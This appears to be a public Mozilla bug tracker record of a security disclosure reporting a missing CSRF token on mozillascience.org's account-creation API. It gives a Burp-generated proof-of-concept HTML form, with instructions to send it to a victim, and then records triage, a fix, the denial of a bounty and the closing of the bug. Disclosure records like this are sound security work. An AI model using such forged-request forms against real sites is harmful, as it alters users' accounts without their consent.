Closed
Bug 1264952
Opened 9 years ago
Closed 3 years ago
Categories
(Mozilla Foundation Communications :: Website, task)
Tracking
(Not tracked)
RESOLVED
WORKSFORME
People
(Reporter: p4r3sh.p4rm4r, Unassigned)
Details
(Keywords: reporter-external, sec-low, wsec-csrf)
Attachments
(1 file)
243 bytes, text/html
User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Steps to reproduce:
While creating an account, I captured the request in Burp Suite, which looks like this:
POST /api/users/create HTTP/1.1
Host: www.mozillascience.org
bio=test
After that I've created a CSRF form:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://www.mozillascience.org/api/users/create"
method="POST">
<input type="hidden" name="bio"
value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Save this form as HTML and send it to the victim. When the victim opens it, his/her bio will be changed to "test".
Actual results:
Anti-CSRF token is missing on this form.
Comment 1•9 years ago
Not sure to whom this should go, so... starting by moving off Marketplace to a (hopefully) more monitored product. NI someone who should know better than I.
Group: client-services-security → mozilla-employee-confidential
Component: General → Metrics
Flags: needinfo?(abigail)
Product: Marketplace → Mozilla Foundation
Comment 3•9 years ago
Simon: this looks like foundation stuff, would you be able to help us find the right person/project to direct this to for development triage?
Status: UNCONFIRMED → NEW
Ever confirmed: true
Updated•9 years ago
Flags: needinfo?(simon)
Comment 4•9 years ago
Abby is the best person to do this work. Abby, could you please work with cade and Hannah to get this fixed?
Jonathan, I'm off on PTO for a week and a bit. Feel free to flag :cade for security issues in my absence.
Thanks, Simon
Flags: needinfo?(simon)
Comment 5•9 years ago
I've deployed CSRF protection to the site: https://github.com/mozilla/science.mozilla.org/pull/222#issuecomment-213015431
Comment 6•9 years ago
Thank you for your report.
Comment 8•9 years ago
Paresh: Thanks for your report. This is not an eligible bounty property. If you're looking for bounties, you should check out the eligible sets on the websec bounty page (https://www.mozilla.org/en-US/security/bug-bounty/faq-webapp/#eligible-bugs). We're planning on adding a bunch of new sites to the list soon, but this web property is not slated for addition. Thank you again!
Flags: sec-bounty? → sec-bounty-
Comment 9•9 years ago
Reporter asked in email to reconsider the bounty decision.
Flags: sec-bounty- → sec-bounty?
Comment 10•9 years ago
I will point out that this is a sec-low rated issue. If that rating is correct, it wouldn't be eligible for a bounty even if it was on a site on the list in comment 8.
Updated•9 years ago
Flags: sec-bounty? → sec-bounty-
Comment 11•9 years ago
This is minused for bounty as a sec-low that isn't on the eligible sites list (both of which would make it ineligible for a bounty).
Updated•9 years ago
Flags: needinfo?(abigail)
Comment 12•8 years ago
Comment 13•3 years ago
mozillascience.org has been gone for a while, it appears.
Group: mozilla-employee-confidential
Status: NEW → RESOLVED
Closed: 3 years ago
Component: Metrics → Website
Product: Mozilla Foundation → Mozilla Foundation Communications
Resolution: --- → WORKSFORME
Updated•1 year ago
Keywords: reporter-external